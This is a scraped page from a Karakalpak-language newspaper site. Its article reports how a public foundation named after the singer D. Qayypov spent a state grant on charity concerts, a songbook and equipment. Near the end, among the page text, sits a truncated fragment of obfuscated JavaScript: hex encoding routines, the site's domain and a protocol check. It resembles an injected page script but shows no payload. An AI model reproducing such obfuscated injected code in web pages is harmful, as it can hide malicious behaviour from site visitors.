Еркин Қарақалпақстан Вести Каракалпакстана 21:49:36, 20.07.2019
Хош келипсиз! | RSS
Сайт мазмуны

Кириў усылы

ҚӘРЕЖЕТКЕ  ЖАРАСА  ҲӘРЕКЕТ

Соңғы жылларда елимизде ҳүкиметлик, жәмийетлик шөлкемлер менен бир қатарда мәмлекетлик емес сектор ўәкиллерине де айрықша итибар қаратылып, олардың жумысларын жанландырыў бойынша кең көлемли илажлар әмелге асырылмақта. Бул бағдарда Өзбе­кистан Республикасы Олий Мажлиси жанындағы мәмлекетлик емес, коммерциялық емес шөлкемлерди ҳәм пуқаралық жәмийетиниң басқа да институтларын қоллап-қуўатлаў жәми­йетлик қоры тәрепинен жәрия­ланған таңлаўлар ҳәм усы таңлаўлар тийкарында ажыратылып атырған грант қаржыларының роли әҳмийетли.

Усы фонд тәрепинен өткен жылдың 27-апрелинен 1-июнине шекемги аралықта «Кекселерди қәдирлеў жылы» Мәмлекетлик бағдарламасында белгиленген   ўазыйпаларды әмелге асырыўға МКШ лерди кеңнен тартыў ҳәм мәмлекетлик социаллық бағдарламаларды әмелге асырыўда демократиялық реформаларды тереңлестириў ҳәм пуқаралық жәмийетин шөлкем­лестириўди ғалаба хабар қуралларында кең сәўлелендириўге қаратылған жойбарларды қоллап-қуўатлаў бойынша жәрия­лан­ған грант таңлаўына Қарақалпақстан Республикасы Д.Қа­йыпов атындағы жәмийетлик фонды да өзиниң «Кексе әўладтың өмир жолы — жасларға өрнек» атлы жойбары менен қатнасқан еди. Бул жойбар Өзбекистан Республикасы Олий Мажлиси жанындағы мәмлекетлик емес, коммерциялық емес шөлкемлерди ҳәм пуқаралық жәмийетиниң басқа да институтларын қоллап-қуўатлаў жәми­йетлик фонды қаржыларын бас­қарыў бойынша Парламент комиссиясы тәрепинен жоқары баҳаланып, 15 миллион сум муғдарындағы мәмлекетлик грантты жеңип алды.

Мәмлекетлик грантты жеңип алған күннен баслап, оны мақсетке муўапық жумсаў бойынша тийисли илажларды белгилеп алдық. Усы илажларды әмелге асырыў мақсетинде 2015-жылдың октябрь айында Тақыятас қаласындағы қариялар ҳәм ма­йыплар, урыс ҳәм мийнет ветеранлары санаторийинде, декабрь айында Шымбай районындағы 8-санлы Балалар музыка ҳәм көркем өнер мектебинде, Кегейли районы Мәденият ҳәм халықтың дем алыў орайында қайыр-сақаўат концерт бағдарламасы шөлкемлестирилди. Усындай концерт бағдарламасы быйылғы жылдың январь айында Нөкис қалалық медицина бирлеспеси ҳәм 12-санлы Ә.Тарийхов атындағы Балалар музыка ҳәм көркем өнер мектебинде де өткерилип, оларға емлеўханада даўаланып атырған пуқаралар, медицина хызметкерлери ҳәм пайтахтымыздағы «Шайырлар аўылы», «Халықлар дослығы», «Шығыс» мәкан пуқаралар жы­йынларының турғынлары қатнасып, өзлериниң жоқары баҳасын берди. Бул концертлерде тийкарынан ҳәр еки жылдан бир өткерилип киятырған Даўытбай Қа­йыпов атындағы «Бүлбилзибан» республикалық таңлаўының лау­реатлары менен дипломантлары марҳум қосықшы репертуарынан орын алған ҳәм басқа да халық қосықларын жанлы ҳаўазда атқарып, көркем өнер ықласбентлериниң дийдинен шықты, десек асыра айтқан болмаймыз. Соны да атап өтиў керек, өткерилген бул илажлар даўамында олардың қатнасыўшыларына Д.Қайыповтың қосықлары жазылған 330 дана «Қосықлар гүлдәстеси» атлы китап ҳәм 100 ден зыят дисклер саўға етилди.

Жеңип алынған грант қаржысының бир бөлеги усындай илажларға, сондай-ақ, саз әсбаплары, ноутбук, фотоаппарат сатып алынып, қордың матер­иаллық-техникалық базасы беккемленбекте.

Сондай-ақ, белгили шайыр ҳәм композиторлар менен шәртнама тийкарында жаңа нама ҳәм қосықлар дөретиў үстинде тығыз бирге ислесип атырмыз. Усындай бирге ислесиўдиң нәтийжесинде бир қанша жаңа қосықлар дөретилип, өз ықласбентлерине ийе болды.

Әлбетте, бундай жумысларды қыйыншылықсыз әмелге асырыў ушын бизге шараят жаратып берген Президентимиз бенен ҳүкиметимизге, тийисли муғдарда грант қаржыларын ажырат­қан Өзбекистан Республикасы Олий Мажлиси жанындағы мәмлекетлик емес, коммерциялық емес шөлкемлерди ҳәм пуқаралық жәмийетиниң басқа да институтларын қоллап-қуўатлаў жәми­йетлик фондына терең миннетдаршылық билдирген ҳалда алдағы ўақытлары да халқымыздың миллий мәдениятымызға, көркем өнеримизге болған талабын қанаатландырыў жолында аянбай мийнет ете беремиз.

Б.ҚАЙЫПОВ,

Д.Қайыпов атындағы жәмийетлик фонды баслығы.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "erkinkarakalpak.uz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Излеў

Көп оқылған мақалалар

Сыбайлас сайтлар

Қарақалпақстан Республикасы Жоқарғы Кеңеси ҳәм Министрлер Кеңесиниң газеталары.
Қарақалпақстан баспасөз ҳәм хабар агентлигинде 2007-жыл 7-февральда дизимге алынған. Гүўалық № 01-001
Developed by TUIT NF